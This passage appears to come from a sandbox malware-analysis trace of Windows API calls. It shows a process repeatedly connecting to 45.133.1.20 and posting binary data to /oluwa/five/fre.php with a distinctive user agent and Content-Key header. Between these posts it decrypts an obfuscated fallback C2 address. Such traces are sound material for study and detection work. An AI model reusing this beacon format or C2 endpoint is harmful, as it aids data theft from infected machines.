(lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0261.645] GetProcessHeap () returned 0x6a0000 [0261.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0261.645] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0261.645] GetProcessHeap () returned 0x6a0000 [0261.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0261.645] socket (af=2, type=1, protocol=6) returned 0x8f4 [0261.645] connect (s=0x8f4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0261.668] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0261.668] GetProcessHeap () returned 0x6a0000 [0261.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0261.669] GetProcessHeap () returned 0x6a0000 [0261.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0261.669] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.670] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0261.670] GetProcessHeap () returned 0x6a0000 [0261.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba470 [0261.670] GetProcessHeap () returned 0x6a0000 [0261.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0261.671] GetProcessHeap () returned 0x6a0000 [0261.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0261.671] GetProcessHeap () returned 0x6a0000 [0261.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0261.672] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.673] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0261.673] GetProcessHeap () returned 0x6a0000 [0261.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0261.673] GetProcessHeap () returned 0x6a0000 [0261.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0261.674] send (s=0x8f4, buf=0x6bd460*, len=242, flags=0) returned 242 [0261.676] send (s=0x8f4, buf=0x6bb998*, len=159, flags=0) returned 159 [0261.677] GetProcessHeap () returned 0x6a0000 [0261.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0261.677] recv (in: s=0x8f4, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0261.748] GetProcessHeap () returned 0x6a0000 [0261.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0261.749] GetProcessHeap () returned 0x6a0000 [0261.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0261.749] GetProcessHeap () returned 0x6a0000 [0261.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba470 | out: hHeap=0x6a0000) returned 1 [0261.750] GetProcessHeap () returned 0x6a0000 [0261.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0261.751] closesocket (s=0x8f4) returned 0 [0261.752] GetProcessHeap () returned 0x6a0000 [0261.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0261.752] GetProcessHeap () returned 0x6a0000 [0261.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.752] GetProcessHeap () returned 0x6a0000 [0261.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0261.753] GetProcessHeap () returned 0x6a0000 [0261.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0261.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1644) returned 0x8f4 [0261.755] Sleep (dwMilliseconds=0xea60) [0261.757] GetProcessHeap () returned 0x6a0000 [0261.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0261.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.758] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.766] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.766] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0261.775] GetProcessHeap () returned 0x6a0000 [0261.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c7618 [0261.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.777] CryptImportKey (in: hProv=0x6bf278, pbData=0x6c7618, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0261.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.778] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.779] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.779] GetProcessHeap () returned 0x6a0000 [0261.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7618 | out: hHeap=0x6a0000) returned 1 [0261.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.782] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0261.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.783] CryptDestroyKey (hKey=0x6ad020) returned 1 [0261.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.789] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0261.789] GetProcessHeap () returned 0x6a0000 [0261.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.790] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.790] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.791] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.793] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.794] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.794] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.794] GetProcessHeap () returned 0x6a0000 [0261.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0261.794] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0261.795] GetProcessHeap () returned 0x6a0000 [0261.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0261.795] GetProcessHeap () returned 0x6a0000 [0261.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.795] GetProcessHeap () returned 0x6a0000 [0261.796] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0261.796] GetProcessHeap () returned 0x6a0000 [0261.796] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0261.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.797] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.804] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.804] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0261.812] GetProcessHeap () returned 0x6a0000 [0261.812] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0261.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.814] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0261.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.815] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.817] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.817] GetProcessHeap () returned 0x6a0000 [0261.817] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0261.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.819] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0261.820] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.820] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0261.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.821] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0261.821] GetProcessHeap () returned 0x6a0000 [0261.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.822] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.823] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0261.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.825] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0261.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.827] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0261.828] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.828] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0261.828] GetProcessHeap () returned 0x6a0000 [0261.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0261.828] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0261.828] GetProcessHeap () returned 0x6a0000 [0261.828] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0261.828] socket (af=2, type=1, protocol=6) returned 0x8f8 [0261.829] connect (s=0x8f8, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0261.861] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0261.861] GetProcessHeap () returned 0x6a0000 [0261.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0261.861] GetProcessHeap () returned 0x6a0000 [0261.861] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0261.862] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.863] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0261.863] GetProcessHeap () returned 0x6a0000 [0261.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba2f0 [0261.863] GetProcessHeap () returned 0x6a0000 [0261.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0261.865] GetProcessHeap () returned 0x6a0000 [0261.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0261.865] GetProcessHeap () returned 0x6a0000 [0261.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0261.866] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.867] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0261.867] GetProcessHeap () returned 0x6a0000 [0261.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0261.867] GetProcessHeap () returned 0x6a0000 [0261.867] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0261.868] send (s=0x8f8, buf=0x6bd460*, len=242, flags=0) returned 242 [0261.868] send (s=0x8f8, buf=0x6bb998*, len=159, flags=0) returned 159 [0261.868] GetProcessHeap () returned 0x6a0000 [0261.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0261.868] recv (in: s=0x8f8, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0261.943] GetProcessHeap () returned 0x6a0000 [0261.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0261.944] GetProcessHeap () returned 0x6a0000 [0261.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0261.944] GetProcessHeap () returned 0x6a0000 [0261.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba2f0 | out: hHeap=0x6a0000) returned 1 [0261.945] GetProcessHeap () returned 0x6a0000 [0261.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0261.945] closesocket (s=0x8f8) returned 0 [0261.946] GetProcessHeap () returned 0x6a0000 [0261.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0261.946] GetProcessHeap () returned 0x6a0000 [0261.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.946] GetProcessHeap () returned 0x6a0000 [0261.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0261.947] GetProcessHeap () returned 0x6a0000 [0261.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0261.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1648) returned 0x8f8 [0261.949] Sleep (dwMilliseconds=0xea60) [0261.952] GetProcessHeap () returned 0x6a0000 [0261.952] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0261.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.958] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0261.964] GetProcessHeap () returned 0x6a0000 [0261.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dacf0 [0261.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.965] CryptImportKey (in: hProv=0x6bef48, pbData=0x6dacf0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0261.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.966] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.967] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.967] GetProcessHeap () returned 0x6a0000 [0261.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dacf0 | out: hHeap=0x6a0000) returned 1 [0261.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.969] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0261.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.970] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0261.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.972] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0261.972] GetProcessHeap () returned 0x6a0000 [0261.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.972] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.973] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.974] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.975] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.975] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.975] GetProcessHeap () returned 0x6a0000 [0261.976] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0261.976] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0261.976] GetProcessHeap () returned 0x6a0000 [0261.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0261.976] GetProcessHeap () returned 0x6a0000 [0261.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.979] GetProcessHeap () returned 0x6a0000 [0261.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0261.979] GetProcessHeap () returned 0x6a0000 [0261.979] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0261.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.980] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.986] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.986] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0261.993] GetProcessHeap () returned 0x6a0000 [0261.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0261.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.994] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0261.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.995] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.995] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.995] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.995] GetProcessHeap () returned 0x6a0000 [0261.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0261.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.997] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0261.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.998] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0261.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.999] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0261.999] GetProcessHeap () returned 0x6a0000 [0261.999] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.999] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.000] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0262.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.001] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0262.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.002] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0262.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0262.003] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0262.003] GetProcessHeap () returned 0x6a0000 [0262.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0262.003] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0262.003] GetProcessHeap () returned 0x6a0000 [0262.003] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9d0 [0262.003] socket (af=2, 